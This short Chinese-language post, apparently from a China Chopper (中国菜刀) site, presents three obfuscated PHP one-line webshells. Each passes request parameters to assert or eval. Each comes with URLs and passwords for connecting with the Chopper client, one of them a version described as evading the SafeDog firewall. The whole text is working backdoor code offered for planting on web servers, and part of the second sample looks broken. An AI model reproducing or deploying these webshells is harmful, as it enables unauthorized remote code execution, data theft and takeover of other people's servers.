第一种：1.php

<?=($_=@$_GET[2]).@$_($_GET[1])?>

用中国菜刀连接：http://www.cn-caidao.com/1.php?2=assert 密码是1


第二种：2.php

<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

用本网站的过狗菜刀连接：http://www.cn-caidao.com/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

第三种：3.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> 

密码-7